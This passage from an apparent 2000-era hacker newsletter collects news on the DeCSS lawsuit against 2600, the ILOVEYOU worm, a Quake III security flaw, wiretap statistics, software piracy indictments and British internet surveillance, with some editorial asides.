Pacino, and John Cheever. The hacker's writer: Web scribe Eric Corley launched a First Amendment fight when he posted a program that breaks the code of DVDs. So why has Garbus, with his eye for the limelight and his zeal for the sanctity of intellectual property, taken on the cause of a Long Island cyberjournalist accused by the Motion Picture Association of America of being a copyright thief? "He gets it," says his client, Eric Corley, publisher of the quarterly journal 2600 (www.2600.com), commonly referred to as the "hacker bible," and enemy number one of big Hollywood. Last fall Corley, who goes by the nom de Net of Emmanuel Goldstein, posted to 2600 a program that allows technology-savvy folk to decipher the code of DVDs and then view the films on unlicensed players. The open-source set calls this a First Amendment right. Hollywood calls it piracy and fears a brave new world where people get their movies on the Web for free. In January, the motion picture association slapped Corley and two other defendants with a federal suit alleging copyright violation. When Corley says Garbus "gets it," he's offering no light praise, since factual error, bald deception, and simple misunderstanding have obscured what initially looked like an open-and-shut case for the motion picture industry. The movie moguls are banking on the Digital Millennium Copyright Act of 1998, which expressly forbids providing anything "primarily designed or produced for the purpose of circumventing a technological measure that effectively controls access to a [copyrighted] work." In plain English, that means you can't hand out a tool that breaks through copyright protection. The tool now in question is DeCSS, which appears to smash those barriers, bypassing the Content Scrambling System that guards DVDs and allowing users to do with the contents what they will. Armed with that premise, Hollywood took round one by a rout in January, as a federal district judge granted an injunction that blocked Corley and the other defendants (who have since been dropped from the suit) from posting DeCSS. But Corley battled back, posting a collection of links to sites around the world willing to offer the program. That prompted the motion picture association last month to ask that the injunction be extended to ban such links. By any account except Hollywood's, granting the request would be an egregious gagging of free expression. A newspaper like this one, for instance, would be forbidden from telling its readers how to find the source code to DeCSS on cryptome.org. This so-called prior restraint is a special bugbear of the fourth estate. No surprise, then, that The New York Times has expressed its concern and may file a brief on behalf of Garbus and his client. For his part, Garbus will submit that DeCSS is an exercise in cryptography, an innovation in interoperability, and protected speech to boot. Under that argument, the program should be covered by the "fair use" principle of the First Amendment—putting the Digital Millennium Copyright Act and freedom of expression at irreconcilable odds. The case for the defense does not look good. The entertainment industry is garnering court victories in the fight between the right of commerce to protect intellectual property and the right of Netizens like Corley to speak their minds. Last week, a federal judge in New York ruled for the Recording Industry Association of America in its copyright infringement suit against MP3.com, which allows users to post and download CDs for online listening. Garbus knows lower courts are not often inclined to contradict Congress, so he's already plotting strategies for appeal all the way to the Supreme Court. The matter is being closely followed by Internet wonks, pundits, and practitioners, not to mention those civil libertarians who "get it." "If the judge finds for the plaintiff, and the decision isn't knocked down on appeal," says Yochai Benkler, a professor of information law at New York University, "it will create an environment that's closed like nothing we've ever seen before." Welcome to the latest front in the war for the First Amendment. -------------------------------------------------------------------------- ------ Eric Corley looks like a hacker. All stringy black hair, pale skin, and hunched shoulders, Corley has the unmistakable pallor of someone who spends most of his time alone in front of a computer screen. Hollywood could not have picked a better physical specimen for their relentless campaign to portray the open-source community—programmers and users of operating systems and software whose source code is freely available—as "thieves and pirates." But Corley fails that test in one important regard: He does not hack. He "couldn't hack his way into a paper bag," says one ex-hacker who, naturally, chooses to remain anonymous. No electronic trespasser, Corley is a journalist—and not one lacking in considerable credentials. His journal 2600, founded in 1984, boasts a circulation of 60,000. Between 10,000 and 15,000 visitors drop by the site. Corley hosts a weekly radio broadcast and has appeared on numerous talk shows, including Charlie Rose, Nightline, and 60 Minutes. He has testified before Congress and written editorials for the Times and the Daily News. He gave the commencement address when he graduated from SUNY Stony Brook. He says the movie moguls didn't know how much fight they'd get when they homed in on him. "It was foolish of them to pick [2600]," Corley says. "We've always stood up against this kind of thing. We don't know how to back down." The fact that Corley is a scribe for the hacker world may make him a likely suspect for the motion picture association, but not necessarily a wise one. Corley counts among his admirers—and readers—countless programmers and academics. Oddly, the same logic that made him a target for the movie industry also made him a client that Garbus couldn't pass up. In the DVD trial, the First Amendment lawyer found a story with clearly drawn opponents worthy of a pulp-fiction plot: a powerful, wealthy industry versus a corps of overworked, denigrated protectors of civil liberties. This is white hats against black hats, heroes facing up to villains, good law butting heads with bad. With self-righteous zeal, the motion picture association has harassed open sourcers and free-speech advocates who have posted, or merely linked to, the program once offered by Corley. Soon after Hollywood realized movie discs had been hacked, they fired a salvo of cease-and-desist letters to anyone offering DeCSS. On December 28, the trade organization in charge of licensing movie rights for DVD players filed suit in California, naming 21 individuals and "Does 1-500, inclusive." That's Does as in John, a deft bit of legal language that allows the plaintiff to attack retroactively anyone it chooses. In mid January, Norwegian authorities raided the Oslo home of 16-year-old Jon Johansen, who is accused of first providing DeCSS on the Web. From the beginning, the movie association has made little effort to disguise its enmity toward the hacker community, calling them "nerds" and "anarchists." The group has sent cease-and-desist letters to people in Germany and Australia, places far outside the jurisdiction of injunctions issued in the United States. A 2600 correspondent in Connecticut has been targeted with another federal suit, and a University of Wisconsin student was fired from his job at a computer lab after a letter from Hollywood landed on his boss's desk. For Garbus, the plight of the open-source community is clear. "There is little question in my mind this persecution of hackers is, in many respect, analogous to the Communist red-baiting of yore," he says. "They are being unfairly maligned, and stigmatized, without due cause." According to John Gilmore, the co-founder of the Electronic Frontier Foundation, a civil-liberties group that has picked up the defense tab in all the DVD suits, the program Corley posted was originally one part of an open-source project to develop a movie disc player for the Linux operating system favored by hardcore programmers. Linux supporters saw Hollywood's tactics as a call to arms. They posted thousands of copies of DeCSS throughout the Web as a show of support for Corley. And if the online proliferation weren't enough, the lawyers representing Hollywood accidentally entered the entire DeCSS source code into the public record. All this for a program that Corley and much of the computing community insist doesn't even do what the film executives say it does: encourage the copying of DVDs. Corley argues DeCSS exists solely to allow people to view movies they own on unlicensed players, like ones that run on Linux—an operating system Hollywood refused to license. "You have to wonder, why are they so upset at people knowing how to use their technology?" Corley says. "They don't care about copying. Copying is easy. People have been copying for ages. There are whole warehouses in Asia copying DVDs and nothing else." Yet when the film industry first filed suit in California last November, president Jack Valenti raised the specter of marauding hackers and thieves out to defraud Hollywood. Valenti told Daily Variety: "[W]e don't have broadband access today, so we don't have many [pirated] movies on the Internet today . . . By the middle or end of next year, we will have an avalanche." But a month before Valenti's apocalypse was scheduled to appear, a lawyer for the industry group admits he, the former deputy director of the antipiracy division, has yet to uncover a single instance of piracy using DeCSS. "Do I know of any incidents of piracy, personally? No," says Greg Goeckner. "But I would have to check with my team in the field." The movie association may have a hard time uncovering any pirates sailing under the DeCSS flag. Gilmore, of the Electronic Frontier Foundation, explains that DVD movies are far too big for easy duplication. "The only place you could store your movie would be on your hard drive," he says, "and even then you could only hold four such movies at most." Gilmore also points out that it could take hundreds of hours to download a DVD over a 56k modem, so merely transferring these files would mean disabling your computer for weeks, all for the purpose of gaining a bootleg copy of The Matrix. The film association hasn't found any instances of DeCSS piracy for one simple reason: There's no cause to do it. -------------------------------------------------------------------------- ------ If DeCSS isn't likely to be used for pirating movies, why does the program pose a threat so dire that Hollywood turned to the courts for relief? This will be one of Garbus's first questions, if he ever sees the courtroom on Corley's behalf. On April 25, attorneys for the movie association filed a motion to disqualify Garbus from the case. Garbus's firm, it turns out, represents Scholastic in an unrelated case. Time Warner, a member of the association, owns Scholastic, and you're not supposed to defend and attack the same client at the same time. This technicality may be enough to kick Garbus out of the suit. "He probably has a 50-50 chance," speculated one legal observer close to the action. If Hollywood wins, Garbus is gone, barred from appearing for Corley as counsel. The Electronic Frontier Foundation and Corley go back to soliciting solicitors, their appeal enhanced through association with Garbus. If the motion fails, the movie execs will have a formidable foe on their hands. War is hell and so is law, and Garbus sees little difference between the two. But a firebrand trial lawyer isn't all Corley gets. Garbus is an icon of "East Coast Code," a term coined by Lawrence Lessig to describe the legal code. Garbus must now convince the court to consider the rights of "West Coast Code," or source code. He will argue that DeCSS falls under the First Amendment's fair-use exception to the Copyright Act. The doctrine of fair use permits, for example, a reporter to quote paragraphs from a book or print sections of a pamphlet. In the case of DVDs, the only way a consumer can copy specific portions is to use DeCSS. Barring people from doing that is a more insidious encroachment on individual liberty than it first appears. "Say you want to criticize the liberal leanings of Hollywood, or criticize the sexist movie of this or that," says Benkler, the NYU law professor. "You need to be able to quote little pieces of the movie. You can do that under the copyright law, because that's fair use, but using DVDs lawfully as the [film association] reads the law, you can't do that. This really extinguishes user privilege to an unprecedented degree." This same privilege was tried—and survived—in an oft-cited suit in 1984 involving Betamax, which manufactured early video recorders. The question then was the same one asked now: whether the entertainment industry's right to safeguard its products carries more weight than the right of individuals to access copyrighted works for their own expressive, and protected, ends. The First Amendment also protects a process called reverse-engineering, which was used to create DeCSS. Reverse engineers take things apart in order to learn how to put them back together in a better form. In other words, to build a better mousetrap. The right to take things apart—whether breakfast cereals or pharmaceutical compounds—is a time-honored tenet in American law, held to encourage innovation. So far, judges have been friendly to reverse engineers. This year, the Ninth U.S. Circuit Court of Appeals ruled that Connectix's Virtual Game Station, which allows Mac users to play Sony PlayStation games on their computers, had not violated copyright law because it was reverse-engineered from PlayStation. In the case of DeCSS, the upshot is that the program is already out there. The DVD encryption was a flimsy system that everyone in the open-source world knew would be hacked, sooner rather than later. East Coast Code may enjoin open-source programmers and "pirates" from posting and trading DeCSS, but with an estimated 300,000 copies already in existence, only West Coast Code, i.e., a better encryption scheme, is going to maintain Big Hollywood's grip on user privilege. In the Wild, Wild Web, you're responsible for your own fences. East Coast Code don't mean shit. Tell us what you think. editor@villagevoice.com @HWA 152.0 [HNN] Virus Says 'I Love You' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 4th contributed by Evil Wench A virus making the rounds of Asia is very similar to Melissa but has a subject of "I Love You". The fast spreading virus has already hit several dozen businesses in Hong Kong clogging their email systems. Wall Street Journal - via ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2561663,00.html 'I love you' e-mail virus spreading A Melissa-like computer virus, bearing the title 'I love you,' is sweeping through Asia and appears to be spreading worldwide. WSJ Interactive Edition May 4, 2000 4:40 AM PT HONG KONG -- A computer virus spread by e-mail messages bearing the title "I Love You" spread through Asian businesses Thursday afternoon, and appeared to be quickly tainting computer systems world-wide. If the attachment holding the virus is opened, the virus apparently multiplies by finding other e-mail addresses and prompting the computer to generate new e-mail. Victims sometimes receive dozens of e-mail messages, all contaminated with the virus. The virus, which appeared in Hong Kong late Thursday afternoon, seemed to particularly hit, among other businesses, public relations firms and investment banks. Dow Jones and the Asian Wall Street Journal offices in Asia were among its victims. In Hong Kong, Nomura International Ltd. is receiving the e-mail virus, an analyst said. The virus has created a lot of damage in Nomura's London office, he said. "It just multiplies through the system and eradicates whole address books," the analyst said. Simon Flint, currency strategist at Bank of America in Singapore, said he has received e-mail messages warning him of the virus but hasn't received the actual virus @HWA 153.0 [HNN] Quake III Flaw Leaves Users Vulnerable ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 4th contributed by Code Kid Q security hole in Quake III could leave users vulnerable to internet attack while they play the game. The hole could allow a malicious server operator to overwrite any file on a client system. Id Software was notified of the issue by Internet Security Systems, Inc. who held off on announcing the hole until Id Software could issue a patch. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2561554,00.html Quake III flaw could frag your computer Apply the patch now. Otherwise, a Trojan server could be shooting up your system while you play. By Rob Lemos, ZDNet News May 3, 2000 5:34 PM PT Game developer Id Software Inc. announced on Wednesday that its flagship first-person shooter has a security flaw that could leave Quake III players' computers open to attack while they play. "The basic nature of the exploit is that malicious server operators could overwrite any file on a client system," wrote Robert Duffy, a programmer at Id Software , in his .plan file on Wednesday. The flaw was found last week by network security firm Internet Security Systems Inc. and could allow an attacker running a Quake III server to read and write to any player's computer connecting that server. Internet Security Systems waited until Id Software could issue a patch before sending out an alert to users and the press. "This vulnerability is important to network administrators who may be unaware that users are accessing potentially malicious Quake3Arena servers outside their network," wrote Internet Security Systems in the alert. Id Software fixed the flaw in its latest patch release, Version 1.17, released on Wednesday. To force users to move over to the secured Quake III client, Id Software has made Version 1.17 of the game incompatible with earlier -- and insecure -- versions. @HWA 154.0 [HNN] Phone Taps on the Rise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 4th contributed by Evil Wench and root66 Federal and State law enforcement agencies ordered 20% more wiretaps last year on cell phones, pagers, fax machine, and email. The total number of wiretaps ordered last year was 1,350 of which only 30% where the traditional 'bug' hidden in a wall or clamped onto a phone line. The rest where done digitally at the phone station or by eavesdropping in electronically. USA Today US Courts http://www.usatoday.com/life/cyber/tech/cth831.htm http://www.uscourts.gov/Press_Releases/press_050100.html 06/07/00- Updated 07:51 PM ET Technology boosts government wiretaps Fax machines, cell phones, pagers and e-mail targeted By Richard Willing, USA TODAY WASHINGTON - Wiretaps ordered by federal and state authorities on cell phones, pagers, fax machines and e-mail increased by nearly 20% last year, pushing the total number of government wiretaps to a record 1,350. Traditional wiretaps, such as microphones hidden in walls and "bugs" planted on telephone lines, account for about one-third of all surveillance devices, according to an annual wiretap survey released Tuesday by the Administrative Office of the U.S. Courts. Many of the taps were done by devices that pluck calls from the air or eavesdrop at cellular phone switching stations. Nearly three-quarters of the taps were ordered in narcotics investigations, the report said. The overall increase was fueled by improved surveillance technology and by the continued aggressive use of taps by the Clinton administration Department of Justice. In 1999, the Justice Department got court permission to carry out 601 wiretaps, up from the 340 authorized in 1992, the year before Clinton took office. "Clinton supported wiretapping when he was governor of Arkansas, and there's been a noticeable push since he became president," said David Banisar, senior fellow of the Electronic Privacy Information Center, a watchdog group in Washington. "At the same time, you've got the explosion in cell phones happening," Banisar said. "Everyone is using them, including the people the police want to intercept." Justice Department spokeswoman Chris Watney said wiretaps were used in fewer than 1% of the 50,000 criminal cases brought by the department last year. "That shows you how selective we are in deciding when wiretaps are necessary and appropriate," she said. Under a 1968 federal law and separate laws in 42 states, police may obtain permission to tap only by convincing a judge that the device would produce evidence of a crime that could not be obtained any other way. No state or federal request was turned down last year; three have been rejected since 1989. Among the report's other findings: Wiretaps sought by state and local authorities declined by 2% last year, the first such decrease since 1995. The overall increase in wiretaps produced more arrests in 1999 but a lower conviction rate, about 15%. Five states - New York, California, New Jersey, Pennsylvania and Illinois - accounted for 81% of all state-ordered wiretaps approved last year. Fourteen of the 42 states that authorize wiretaps ordered no taps. Federal agents sought authority for seven e-mail taps last year, two more than in 1998. "Roving" taps, a recently authorized federal technique aimed at individuals rather than phone or pager numbers, increased from 12 in 1998 to 23 last year. The tendency to rely on wiretaps varied among prosecutors. Taps were used extensively, for example, in federal drug investigations in central California and southern Florida. New York City's Special Narcotics Bureau got permission for 135 taps, more than any state other than New York. New technology helped simplify the process of tapping cell phones. Increasingly, cell phone tappers listen in at central switching stations as calls are relayed to other cellular or hard-wired phones. Police also use "trigger fish," devices that can pluck cell calls out of the air but must be used near the caller. -=- NEWS RELEASE Administrative Office of the U.S. Courts May 1, 2000 Contact: Karen Redmond Surveillance of Drug Offense Operations Drives 1999 Growth in Applications for Wiretaps The number of applications for wiretap orders requested in 1999 rose 2 percent to 1,350, up from 1,331 in 1998, according to the 1999 Wiretap Report, A Report of the Director of the Administrative Office of the United States Courts on Applications for Orders Authorizing or Approving the Interception of Wire, Oral, or Electronic Communications. Federal or state judges authorized all applications that were requested. In 1999, violation of drug laws remained the major offense investigated through wiretaps, with racketeering as the second largest category. The most common location for the placement of wiretaps was in a single family dwelling. In 1999, a total of 4,372 persons were reported arrested based on interceptions of wire, oral, or electronic communications. The wiretap report is submitted annually to Congress by the Administrative Office of the U.S. Courts. During 1999, 28 jurisdictions reported using wire, oral or electronic surveillance as an investigative tool. The federal government, the District of Columbia, the Virgin Islands and 42 states currently have laws authorizing courts to issue orders permitting such surveillance. The number of applications approved by federal courts in 1999 increased 6 percent, while approvals by state courts fell 2 percent below the 1998 levels. (See attached Table 1.) Wiretap applications in New York (343 applications), California (76), New Jersey (71), Pennsylvania (69), and Illinois (50) accounted for 81 percent of all authorizations approved by state judges. Most state laws limit the period of surveillance under an original order to 30 days, although extensions may be granted. Among state wiretaps, the longest was a 510-day intercept used in a racketeering investigation in New York County, New York. The longest federal intercept occurred in the Western District of Texas, where a 289-day wiretap was used in a narcotics investigation. A total of 978 intercept applications, or 72 percent of all applications for intercepts authorized in 1999, cited drug offenses as the most serious offense under investigation. Several criminal offenses may be under investigation, but only the most serious offense is named in an application. The use of federal intercepts to conduct drug investigations was most common in the Central District of California (38 applications) and the Southern District of Florida (34 applications). On the state level, the New York City Special Narcotics Bureau obtained authorizations for 135 drug-related intercepts, which accounted for the highest percentage of all drug-related intercepts reported by state or local jurisdictions. Racketeering was cited in 139 of the applications, followed by homicide/assault (62), and gambling (60). (See attached Table 7.) In 1999, 18 percent of all intercept devices, or 248 wiretaps, were authorized for single-family dwellings, a category that includes houses, rowhouses, townhouses, and duplexes. Forty-nine percent of intercept applications, or 663 applications, specified “other” locations. These may include electronic wiretaps such as mobile telephones, electronic pagers, and cellular telephones. As of December 31, 1999, a total of 4,372 persons had been arrested based on interceptions reported. Fifteen percent, or 654 persons, were convicted. Federal wiretaps were responsible for the most arrests (66 percent) and convictions (55 percent). A wiretap in the Western District of New York resulted in the arrest of 83 persons, the most arrests of any intercept in 1999. A wiretap in the Southern District of Florida produced the most convictions of any wiretap when an intercept used in a drug investigation resulted in the conviction of 23 of the 26 persons arrested. Among state intercepts, the intercept producing the most arrests took place in Middlesex County, New Jersey, where an intercept in a drug investigation resulted in the arrest of 72 persons. Each federal and state judge is required to file a written report with the Director of the Administrative Office of the U.S. Courts on each application for an order authorizing the interception of a wire, oral, or electronic communication (18 U.S.C. 2519(1)). No report to the Administrative Office is required when an order is issued with the consent of one of the principal parties to the communication. A summary report on authorized intercepts is attached. The full report can be found on the Judiciary’s website at www.uscourts.gov. @HWA 155.0 [HNN] Minors Loose Rights In Georgia ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 4th contributed by n0body Georgia law now allows parents to record juveniles telephone and email communications if they believe the child is involved in criminal activity or otherwise in danger. (And what about the person who the child is talking to, do they have any rights?) APB Online http://www.apbnews.com/safetycenter/family/2000/05/03/wiretap0503_01.html Georgia Lets Parents Tap Kids' Phones Officials Say Safety, Criminal Concerns Outweigh Privacy Issue May 3, 2000 By Randy Wyles ATLANTA (APBnews.com) -- Parents and prosecutors in Georgia have a new weapon in their fight to protect children from crime -- the right to record juveniles' phone conversations. Under a new law signed by Gov. Roy Barnes last week, parents can legally record their children's private phone conversations and e-mails if they believe the children are in danger or involved in criminal activity. The legislation stems from a case in the Atlanta suburb of Marietta in which the district attorney and the parents of a 13-year-old girl said a former family friend molested the teen. The prosecutor in the case had tried to introduce audio recordings into court as evidence of allegedly inappropriate sexual phone conversations between the child and the accused. Kyle "Rick" Bishop, 40, was charged with aggravated child molestation and aggravated sexual battery for the alleged affair with the girl. "I guarantee if you or anyone else hears the tapes, there will be no doubt in anyone's mind that he is guilty," said David C. Scott, the girl's father. Late-night calls led to visits The girl was 11 when Bishop, a neighbor, allegedly began fostering a relationship with her that Scott said he wanted to develop sexually. Scott said Bishop claims his daughter pursued him. The girl's parents became suspicious when late-night phone calls led to frequent visits by the child to Bishop's home to watch television. So the parents began eavesdropping and recording the phone conversations. One night four years ago, Scott's wife listened in on a conversation that shocked her. "The nature of that conversation was so sexually explicit that my wife immediately called the police after making my daughter hang up the telephone," Scott said. One party must know of tap Bishop was arrested and charged. As part of his bond agreement, he was not allowed within a mile of the family, which meant he had to move. The court even refused to let him return to his home, forcing Bishop to arrange for friends to move his belongings. The case was finally placed on the court docket last year. But during a pretrial hearing, Bishop's defense attorney filed a motion preventing the tapes from being introduced as evidence, citing a violation of Georgia privacy laws. Georgia law permits a person to record phone conversations as long as one of the parties involved with the call is aware it's being done. Bishop's attorney contended neither the child nor Bishop knew the calls were being recorded and that the parents did not have a right to record the conversations, even though they were made on the Scotts' home phones and involved their child. The court ruled against the defense motion, but Bishop took it to the Court of Appeals, which overturned the ruling in his favor. At the same time, the Georgia Legislature took up the issue and passed a measure that allows parents the right to record their children's conversations. Can law be applied retroactively? Meanwhile, Cobb County District Attorney Pat Head of Marietta, the prosecutor in the case, filed a motion to overturn the Court of Appeals' decision with the Georgia Supreme Court, which has yet to rule. There is some debate as to whether the new law could actually be applied retroactively to the very case that sparked the legislation. "If [the Georgia Supreme Court] does affirm the Court of Appeals, then we're taking the position that the law that has changed is procedural and not substantive and that it does not affect any of [Bishop's] constitutional rights nor any of his statutory rights, but is simply a matter under which evidence is admitted in court," Head said. But the district attorney still feels positive about the new law, no matter how the case is resolved. "Its a tool by which the parents are going to be given, at least, the availability of keeping some control of their children and knowing what their children are involved in," Head said. As far as the Scotts are concerned, their hopes rest with Head, the Georgia Supreme Court and the new law. "I'm saddened that my daughter has had a number of years of her childhood stolen from her," Scott said. "But it's just not part of my constitution to want to take a baseball bat to somebody. Seeing this guy go to jail, that makes me very, very gratified." Randy Wyles is an APBnews.com correspondent in Atlanta. @HWA 156.0 [HNN] 'I Love You' ~~~~~~~~~~~~~~~~~~ May 5th contributed by Everybody Technical Details First, as soon as a user opens the worm file (usually by double-clicking), the malicious code accesses the Microsoft Outlook address book and sends a copy of itself to every entry. Second, the worm copies itself into images (.jpg and .jpeg), Visual Basic scripts (.vbs and .vbe) and Javascript (.je and .jse) deleting their previous contents. Music files (.mp3 and .mp2) are hidden and a file of the same name which contains the worm's script and a .vbs file extension is put in its place. The worm will also infects files on networked and mapped drives as well as sending itself to people who join a chat room with an infected member (via mIRC). Finally, the virus will attempt to contact one of four Web sites in the Philippines that supposedly have a file called WIN-BUGSFIX.exe prepared for download. Those sites have since been taken off line by the Internet service provider . ZD Net CNN Reuters Quick Facts The virus/worm appears to have originated in the Philippines although some reports now indicate Europe. The malicious code spread around the world in approximately six hours. CERT claims 300,000 infected computers at 250 sites world wide where reported as of 2pm EST yesterday. This dwarfs Melissa's reach. There are already at least three variants including one called 'joke' and 'Susitikim'. Various Links People who have analyzed the code have said that its organization is rather sloppy and it does not indicate good programing skills. Look for yourself SANS has posted a copy of the source. SANS The hosting company of the four web pages pointed to by the virus/worm have been taken off line by the ISP. ZD Net The CERT Advisory recommends that network administrators places filters on "ILOVEYOU" in the email headers. (This will not stop the variants though.) CERT Changing subject line defeats some filters. C|Net 'I Love You' clean up expected to dwarf Melissa's $80 million price tag. C|Net FW:Joke replacing ILOVEYOU in trip around the world. MSNBC Several anti-virus software vendors have set up 'I Love You" information centers and they have posted new versions of their virus definition files. F-Secure Symantec BindView http://www.zdnet.com/zdnn/stories/news/0,4586,2562483,00.html?chkpt http://cnn.com/2000/TECH/computing/05/04/iloveyou/index.html http://dailynews.yahoo.com/h/nm/20000504/ts/tech_virus.html http://www.sans.org/y2k/050400-1100.htm http://www.zdnet.com/zdnn/stories/news/0,4586,2562211,00.html http://www.cert.org/advisories/CA-2000-04.html http://news.cnet.com/news/0-1003-200-1815107.html?tag http://news.cnet.com/news/0-1003-200-1814907.html?tag http://www.msnbc.com/news/403350.asp?bt http://www.msnbc.com/m/olk2k/ http://www.f-secure.com http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html http://www.bindview.com/news/2000/0504.html @HWA 157.0 [HNN] Microsoft Employee Busted for Piracy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 5th contributed by acopalyse A Chicago Grand Jury has indicted 17 people, including a former employee of Microsoft and five employees of Intel for allegedly infringing the copyright on more than 5,000 computer software programs. 12 of the 17 were allegedly members of the group known as 'Pirates with Attitudes' (PWA), infiltrated by government agents last year. PWA's alleged leader, Marlenus (Robin Rothberg), was also indicted. [ Yes PWA *did* influence our choice of a name for HWA and *no* we do not have any official affiliation with the group or any of its members past or present.. - Ed ] ABC News http://abcnews.go.com/sections/tech/DailyNews/Intel000504.html Suspected Software Thieves Indicted Authorities Arrest Microsoft, Intel Employees C H I C A G O, May 4 — Prosecutors today announced the indictment of a global ring of suspected software thieves and five workers at chip maker Intel Corp. who allegedly exchanged hardware for access to an array of pirated software. A federal grand jury in Chicago indicted 17 people, including a former Microsoft Corp. employee and two Europeans, for allegedly infringing the copyright on more than 5,000 computer software programs. Of those indicted, 12 were allegedly members of the group known as “Pirates with Attitudes” (PWA), a software piracy ring that was infiltrated by government investigators last year. Their Web site, identified by prosecutors as “Sentinel” or “WAREZ”, was located on a computer at the University of Sherbrooke in Quebec and accumulated software that was stripped of its embedded copy protection by members. Programs available for downloading to those provided access via a secure Internet protocol address included operating systems, applications such as word processing and data analysis, games and MP3 music files, prosecutors said. Four employees of Santa Clara, California-based Intel shipped hardware to the site in Canada in 1998 to give it more storage capacity. In exchange, they and other Intel employees were to be given access to the pirated software, which a fifth employee allegedly arranged. The company was unaware of the scheme, prosecutors said. Microsoft Employee Implicated Another defendant was an employee of Redmond, Washington-based Microsoft Corp. who allegedly supplied bootleg copies of the software giant’s products for the site. He also allegedly gave access to Microsoft’s internal network to the ringleader of PWA. The alleged ringleader, Robin Rothberg, 32, also known by the online moniker “Marlenus,” of North Chelmsford, Massachusetts, was charged in February with conspiring to violate the copyrights on thousands of computer programs. He has been out of jail on bond but was summoned to appear in Chicago. Among those indicted were alleged PWA members from Belgium and Sweden. Last year, the Justice Department said it was launching an initiative to combat piracy and counterfeiting of intellectual property. “This is the most significant investigation of copyright infringement involving the use of the Internet conducted to date by the FBI,” said Kathleen McChesney, head of the FBI’s Chicago office. If convicted, the defendants could spend five years in prison and pay a $250,000 fine, or they could be ordered to pay a fine totaling twice the gross gain to any defendant or twice the gross loss to any victim, whichever is greater. @HWA 158.0 [HNN] Cisco Insider Convicted of Stealing PIX Source ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 5th contributed by acopalyse A former employee of Cisco Systems has been found guilty by a jury in Santa Clara County Superior Court of stealing the source code to Private Internet Exchange (PIX). the source code was estimated to be worth billions of dollars. (Yes, that is a B.) San Jose Mercury News http://www.mercurycenter.com/svtech/news/front/docs/cisco050300.htm Url fucked off @HWA 159.0 [HNN] British Plan to Monitor Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 5th contributed by The Hex The British are building the Government Technical Assistance Centre to eavesdrop on all information sent over the Internet in Britain. The system will be centered in the headquarters of MI5, the British secret service agency. All of Britain's Internet Service Providers will be connected to the GTAC through dedicated lines (which they will have to pay for themselves). The government insists that when the system is finished by the end of this year that absolutely nothing will be intercepted without a warrant. (Uh huh, sure.) Wired http://www.wired.com/news/business/0,1367,36031,00.html Brits Launch Online Spy Network Wired News Report 3:00 a.m. May. 2, 2000 PDT A few weeks back, Russia's secret service agency raised privacy watchdogs' hackles when it admitted it could intercept and monitor all Russian Internet traffic. On Sunday the British government acknowledged that it was building a system that could do the same thing in Great Britain, ostensibly to help catch money launderers, terrorists, pedophiles, and other criminals who do business online. It also could help usher in an era of Orwellian surveillance, privacy advocates fear. "They've taken a lead from the KGB," said Jason Catlett, president of Junkbusters, an online privacy advocacy group. The British system, called the Government Technical Assistance Centre, will have its hub in the headquarters of the MI5, the British secret service agency. All of Britain's Internet Service Providers will be connected to the GTAC through dedicated lines (which they will have to pay for themselves). After its scheduled completion by the end of the year, the system will allow British police and secret service agents to intercept every bit of the country's Internet traffic. That could include email, credit card transactions, banking data -- any information exchanged between computers on the Web. But absolutely nothing will be intercepted without a warrant, the British government insists. "There's no way (the security services) are going to be trawling through everybody's emails," said a government spokeswoman. "Every intercept will be obtained in the same way it is now: a warrant has to be signed by the secretary of state." It's no different than tapping phone lines, the government insisted. Despite the government's assurances, legal experts warn that the system could be easily abused. "It sounds reasonable -- catch terrorists, criminals, and so on -- but it has the potential to be particularly unreasonable," said Brian Smith, an international e-commerce and banking attorney with the Washington-based law firm Mayer Brown & Platt. "They will know where people are putting their money, how they're spending, who they're talking to." Security agents might be tempted to access information without a warrant, or might obtain warrants on dubious pretexts. Moreover, Net users and business all over the world could potentially be effected by the system. "This is not just a matter for the U.K.," Smith said. "They'll be able to see everything that goes through the U.K. A multinational company may be sending confidential information about its business plans through the U.K., and who knows what might happen? Just look at how the U.S. government has used employee emails in its case against Microsoft." The British government's acknowledgment of its planned system is sure to re-ignite speculation about the existence of Echelon, a supposed international electronic surveillance network. Privacy advocates and a number of politicians are convinced that the system exists, but government officials in Europe and the United States have repeatedly denied it. Reuters contributed to this report. @HWA 160.0 [HNN] MPAA Tries to Ban 2600 Lawyer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 5th contributed by Macki The MPAA has filed a motion to disqualify the high profile lawyer retained by 2600 in its fight over DeCSS. The MPAA suit alleges that Martin Garbus' firm can not represent 2600 due to a conflict of interest. 2600.com This legal brief is immense but it is a tour de force for reverse engineering and fair use rights. Lets hope the court agrees! Definately recomended reading for anyone interested in this case. Cryptome http://www.2600.com/news/2000/0505.html http://cryptome.org/mpaa-v-2600-rb.htm @HWA 161.0 [HNN] Apache.org Defaced ~~~~~~~~~~~~~~~~~~~~~~~~ May 5th (My story seems to have been ripped since the info/article i sent on this to them shows through in this text, thats 'ok' I suppose ... isn't it? - Ed) contributed by McIntyre Home of the popular Apache software was defaced last month by a group of determined individuals. Unlike an ordinary intrusion that uses scripts or vulnerabilities in the operating system these hackers focused solely on configuration errors to change the 'Powered by Apache' logo to 'Powered by Back Office' (Yes, this was actually a hack and not a scritp kiddie clicking a mouse button.) Attrition.org - Mirror of Defaced Site Dataloss.net - How they did it. http://www.attrition.org/mirror/attrition/2000/05/03/www.apache.org/ http://www.dataloss.net/papers/how.defaced.apache.org.txt @HWA 162.0 [HNN] Voice Security on the Cheap ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 5th contributed by dark_wyrm Starium, a company based in Monterey, CA, plans to sell telephone scrambling devices that connect to the handset of any telephone. The units would compress, filter, and encrypt voice communications. Starium claims that there is no NSA backdoor. Retail price for the unit is expected to be less than $100. Wired http://www.wired.com/news/technology/0,1282,21236,00.html Starium Promises Phone Privacy by Declan McCullagh 3:00 a.m. Aug. 12, 1999 PDT 